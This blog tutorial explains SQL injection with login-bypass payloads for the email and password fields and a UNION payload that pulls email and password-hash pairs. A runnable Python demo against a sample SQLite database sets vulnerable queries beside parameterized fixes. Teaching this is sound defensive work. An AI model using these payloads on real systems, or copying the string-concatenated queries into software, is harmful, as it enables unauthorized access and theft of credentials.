SQL Injection Tutorial: Learn with Example

Hengky Sanjaya
Hengky Sanjaya Blog
3 min read · May 25, 2020

This tutorial is for educational purposes only. Any time the word “Hacking” is used on this site, it shall be regarded as ethical hacking. Do not attempt to violate the law with anything contained here. If you plan to use the content for illegal purposes, please leave this site immediately. We will not be responsible for any illegal actions.

SQL stands for Structured Query Language. It is used to retrieve and manipulate data in the database.

What is a SQL Injection?

SQL Injection is an attack in which untrusted input is inserted into a dynamically built SQL statement so that it changes the structure of the statement rather than just its data. Two common tricks are commenting out part of the statement and appending a condition that is always true.

How does it work?

Let’s say we have this query:

SELECT * FROM users WHERE email = '[userinput]' AND password = md5('1234');

The above query can be exploited by commenting out the password check and appending a condition that is always true (here '1234' stands for whatever password the user submitted). Let's suppose an attacker provides the following input in the email address field:

xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- '

So, it will produce a final query like this:

SELECT * FROM users WHERE email = 'xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' AND password = md5('1234');

Explanation:

  • xxx@xxx.xxx' ends with a single quote, which closes the string literal the application opened for the email value.
  • OR 1 = 1 makes the WHERE clause true for every row; LIMIT 1 trims the result to a single record, so the application sees exactly one "matching" user (the first row in the table, which is often an administrator account).
  • -- starts a SQL comment (in MySQL the marker is "-- " with a trailing space), so the rest of the line, ' AND password = md5('1234'), is ignored and the password check never runs.

Visit this link for a simple web application that is vulnerable to SQL injection attacks, for demonstration purposes only.

A second variant injects into the password field instead of the email field. With the input xxx') OR 1 = 1 -- in the password field, the statement becomes:

SELECT * FROM users WHERE email = 'xxx@xxx.xxx' AND password = md5('xxx') OR 1 = 1 -- ');

Here the payload closes both the string literal and the md5( ) call, then appends OR 1 = 1. Because AND binds more tightly than OR, the WHERE clause is evaluated as (email = ... AND password = ...) OR 1 = 1, which is true for every row, so the login succeeds without a valid password. The picture below walks through how this query evaluates to TRUE.

Source: https://www.guru99.com/images/EthicalHacking/Article_13_6.png

Other SQL Injection attack types

SQL Injection can do more harm than bypassing a login check. Some of the attacks include:

  • Deleting data
  • Updating data
  • Inserting data
  • Executing commands on the database server (where the DBMS exposes such functionality), which can be used to download and install malicious programs such as Trojans
  • Exfiltrating valuable data such as credit card details, email addresses and passwords to a server the attacker controls
  • Obtaining user login details
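The following is an added example, not code from the original post. It reproduces the post's login query against an in-memory SQLite database so that both injected inputs shown above (the email-field payload and the password-field payload) can be run end to end, and it then shows one of the attacks listed here: pulling user records out through an unrelated product search with a UNION payload. The vulnerable and parameterized versions sit side by side. The table names, columns, sample rows and the registered md5() function are assumptions made for this demo (SQLite has no built-in md5(), MySQL does).

```python
import hashlib
import sqlite3

# Added example (not from the original post). Table names, columns and the
# sample rows below are constructed for this demo.


def md5_hex(text: str) -> str:
    """Stand-in for MySQL's md5(): SQLite has none, so we register this one."""
    return hashlib.md5(text.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.create_function("md5", 1, md5_hex)
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("CREATE TABLE products (name TEXT, price TEXT)")
    conn.executemany("INSERT INTO users (email, password) VALUES (?, ?)",
                     [("admin@example.com", md5_hex("s3cret")),     # constructed
                      ("alice@example.com", md5_hex("hunter2"))])   # sample rows
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [("keyboard", "25"), ("mouse", "10")])        # constructed
    return conn


# The two inputs the post injects, written with a real "-- " comment marker.
EMAIL_PAYLOAD = "xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- '"
PASSWORD_PAYLOAD = "xxx') OR 1 = 1 -- "


def vulnerable_login(conn, email, password):
    """Builds the query the way the post does: input pasted straight into SQL."""
    query = (f"SELECT * FROM users WHERE email = '{email}' "
             f"AND password = md5('{password}');")
    return conn.execute(query).fetchone()  # any row back == "logged in"


def safe_login(conn, email, password):
    """Same check with bound parameters: input is data, never parsed as SQL."""
    query = "SELECT * FROM users WHERE email = ? AND password = md5(?)"
    return conn.execute(query, (email, password)).fetchone()


# UNION payload: closes the LIKE pattern, appends a SELECT with the same
# column count (2) from users, and comments out the trailing "%'".
UNION_PAYLOAD = "' UNION SELECT email, password FROM users -- "


def vulnerable_search(conn, term):
    """A product search built the same unsafe way; returns (name, price) rows."""
    query = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(query).fetchall()


def safe_search(conn, term):
    """Parameterized search: the wildcard is added to the bound value, not the SQL."""
    query = "SELECT name, price FROM products WHERE name LIKE ?"
    return conn.execute(query, (f"%{term}%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("email payload    ->", vulnerable_login(db, EMAIL_PAYLOAD, "1234"))
    print("password payload ->", vulnerable_login(db, "xxx@xxx.xxx", PASSWORD_PAYLOAD))
    print("safe login       ->", safe_login(db, EMAIL_PAYLOAD, "1234"))
    for row in vulnerable_search(db, UNION_PAYLOAD):
        print("search leaked    ->", row)
    print("safe search      ->", safe_search(db, UNION_PAYLOAD))
```

Running the script shows the email payload returning the admin row (the first row, because of LIMIT 1), the password payload returning a row despite the wrong password (AND binds tighter than OR), and the UNION payload returning the users' email/hash pairs mixed in with the product rows. The parameterized versions return nothing for the same inputs, because the driver binds them as string values and the SQL text never changes.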

Automation Tools for SQL Injection

In the above example we used manual techniques that depend on knowing SQL. Automated tools can carry out the same attacks more efficiently and in far less time. These tools include SQLMap, SQLPing and SQLSmack (listed in the summary below), among others:

Use Havij for SQL Injection

Summary

  • SQL Injection is an attack type that exploits SQL statements built by concatenating untrusted input into the query text.
  • SQL injection can be used to bypass login checks and to retrieve, insert, update and delete data.
  • SQL injection tools include SQLMap, SQLPing and SQLSmack, among others.
  • Writing SQL with parameterized queries (prepared statements) instead of string concatenation, and validating input, greatly reduces exposure to SQL injection.
